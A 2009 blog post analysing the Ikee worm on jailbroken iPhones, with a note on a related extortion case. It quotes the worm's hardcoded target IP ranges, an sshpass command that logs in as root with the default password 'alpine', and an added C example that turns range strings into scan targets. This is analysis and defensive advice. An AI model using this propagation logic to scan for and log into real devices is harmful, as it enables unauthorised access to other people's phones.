A worm in my Apple
By Sylvain SARMEJEANNE, Monday 9 November 2009 at 15:53 :: General :: #350
A worm is currently spreading among jailbroken iPhones, exploiting the hardcoded root password exposed when an SSH server is installed on the device.
Jailbreaking an iPhone (or an iPod Touch) consists of escaping the sandbox that the user and his applications normally run in, so as to execute code as root and take complete control of the device. Once that is done, packages are usually installed through Cydia, a graphical package manager. The problem arises when the user decides to install an OpenSSH server: this opens remote access to the device through the built-in accounts, whose passwords are hardcoded and well known, the most famous being root with the password alpine.
The attack method is trivial: scan IP ranges for open 22/tcp ports, try to log in over SSH as root:alpine, and execute your commands as root. Recently, a user in the Netherlands used this method to compromise iPhones and blackmailed the victims into paying 5 euros to secure their device (he has since decided to stop, and his web page now only explains how to remove his malicious application).
Then comes the Ikee worm, which exploits the same weakness. Its source code was made public for a few hours, but access to it has since been suspended. Several variants are already spreading (four at the time of writing).
To spread, Ikee generates target IP addresses in several ways:

- addresses "near" the IP address of the device it is currently running on, plus the private 192.168.0.0/16 LAN range:

    char *locRanges = getAddrRange(); // NB: this function calls getifaddrs() to retrieve IP addresses for each interface
    char *lanRanges = "192.168.0.0-192.168.255.255";

- hardcoded ranges, mainly in Australia (Vodafone, Optus and Telstra operators):

    char *vodRanges1 = "202.81.64.0-202.81.79.255";
    char *vodRanges2 = "23.98.128.0-123.98.143.255";
    char *vodRanges3 = "120.16.0.0-120.23.255.255";
    char *optRanges1 = "114.72.0.0-114.75.255.255";
    char *optRanges2 = "203.2.75.0-203.2.75.255";
    char *optRanges3 = "210.49.0.0-210.49.255.255";
    char *optRanges4 = "203.17.140.0-203.17.140.255";
    char *optRanges5 = "203.17.138.0-203.17.138.255";
    char *optRanges6 = "211.28.0.0-211.31.255.255";
    char *telRanges = "58.160.0.0-58.175.255.25";

  (These are reproduced verbatim; the two odd values, a Vodafone range starting at 23.98 instead of 123.98 and a Telstra range ending in .25 rather than .255, look like typos in the worm's source. As written, the first of them covers about 1.68 billion addresses instead of a single /20.)

- random IP addresses
A device can therefore only be infected by this particular worm if it has an Internet-routable IP address (or sits on the same LAN as an infected device). Once an open 22/tcp port has been found, the worm attempts to log in as root with the default password:
asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'echo 99'", VULN_PASS, host);
If the output it gets back contains 99, the remote device is vulnerable and the worm proceeds with the infection. Current variants are not really malicious: they only change the lock-screen wallpaper to a picture of Rick Astley. The worm also stops the OpenSSH service and even deletes the /usr/sbin/sshd binary, which prevents another attacker or worm from exploiting the same weakness:
if (!(in = popen("rm -f /usr/sbin/sshd; killall sshd", "r"))) {
Ironically enough, the device is more secure after infection than before.
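To make the spreading logic above concrete, here is an added example (written for this page, not code from the original post or from the worm's source) that turns range strings in the worm's "a.b.c.d-e.f.g.h" format into scan targets, derives a "nearby" range from a local address, and applies the same "does the reply contain 99" test the probe uses. The enclosing-/16 rule in near_range() is an assumption standing in for getAddrRange(), whose exact logic the post does not show; the local address 203.0.113.42 is constructed. Run on the ranges quoted above, it also shows what the two malformed ranges actually cover.

```c
/* Added example: how Ikee-style range strings become scan targets.
 * Not the worm's code; near_range() is an assumed stand-in for getAddrRange(). */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Parse "a.b.c.d-e.f.g.h" into host-order start/end.
 * Returns 1 on success, 0 if either side is not a dotted quad or the range is reversed. */
int parse_range(const char *spec, uint32_t *start, uint32_t *end)
{
    char lo[INET_ADDRSTRLEN], hi[INET_ADDRSTRLEN];
    const char *dash = strchr(spec, '-');
    struct in_addr a, b;
    size_t n;

    if (!dash)
        return 0;
    n = (size_t)(dash - spec);
    if (n == 0 || n >= sizeof lo || strlen(dash + 1) >= sizeof hi)
        return 0;
    memcpy(lo, spec, n);
    lo[n] = '\0';
    strcpy(hi, dash + 1);
    if (inet_pton(AF_INET, lo, &a) != 1 || inet_pton(AF_INET, hi, &b) != 1)
        return 0;
    *start = ntohl(a.s_addr);
    *end = ntohl(b.s_addr);
    return *start <= *end;
}

/* Number of addresses a range string covers; 0 for an unparsable or reversed range. */
uint64_t range_size(const char *spec)
{
    uint32_t s, e;
    if (!parse_range(spec, &s, &e))
        return 0;
    return (uint64_t)e - s + 1;
}

/* Write the i-th address of the range as a dotted quad into out (>= INET_ADDRSTRLEN bytes).
 * Returns 0 if the index falls outside the range. */
int range_nth(const char *spec, uint64_t i, char *out, size_t outlen)
{
    uint32_t s, e;
    struct in_addr a;
    if (!parse_range(spec, &s, &e) || i > (uint64_t)e - s)
        return 0;
    a.s_addr = htonl(s + (uint32_t)i);
    return inet_ntop(AF_INET, &a, out, outlen) != NULL;
}

/* "Nearby" range for a local address: the enclosing /16 (an assumption; the post
 * does not show getAddrRange()'s rule). Writes "a.b.0.0-a.b.255.255" into out. */
int near_range(const char *local_ip, char *out, size_t outlen)
{
    struct in_addr a;
    unsigned hi, lo;
    if (inet_pton(AF_INET, local_ip, &a) != 1)
        return 0;
    hi = (ntohl(a.s_addr) >> 24) & 0xffu;
    lo = (ntohl(a.s_addr) >> 16) & 0xffu;
    return snprintf(out, outlen, "%u.%u.0.0-%u.%u.255.255", hi, lo, hi, lo) < (int)outlen;
}

/* The worm's probe runs 'echo 99' and treats the host as vulnerable if 99 comes back. */
int reply_marks_vulnerable(const char *reply)
{
    return reply != NULL && strstr(reply, "99") != NULL;
}

int main(void)
{
    const char *ranges[] = {
        "192.168.0.0-192.168.255.255",
        "202.81.64.0-202.81.79.255",
        "23.98.128.0-123.98.143.255",   /* as quoted from the worm's source */
        "58.160.0.0-58.175.255.25",     /* as quoted from the worm's source */
        "10.0.0.1-10.0.0.0",            /* reversed: rejected by parse_range() */
    };
    char near[32], addr[INET_ADDRSTRLEN];
    size_t i;

    for (i = 0; i < sizeof ranges / sizeof ranges[0]; i++)
        printf("%-30s %llu addresses\n", ranges[i],
               (unsigned long long)range_size(ranges[i]));
    if (near_range("203.0.113.42", near, sizeof near))   /* constructed local IP */
        printf("near-range for 203.0.113.42: %s\n", near);
    if (range_nth("202.81.64.0-202.81.79.255", 4095, addr, sizeof addr))
        printf("last target of the first Vodafone range: %s\n", addr);
    return 0;
}
```

The size check is the useful part for an analyst: a range typed as 23.98.128.0-123.98.143.255 is accepted by a naive parser and quietly becomes 1,677,725,696 targets, which is why a defender looking at scan traffic from this worm should not expect it to stay within the Australian operators' address space.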
Obviously, the recommendations are: do not jailbreak an iPhone that holds sensitive data (such as a professional device); do not install an SSH server on it; and if you do, do not forget to change the root password (and that of the other built-in account, mobile, which ships with the same default).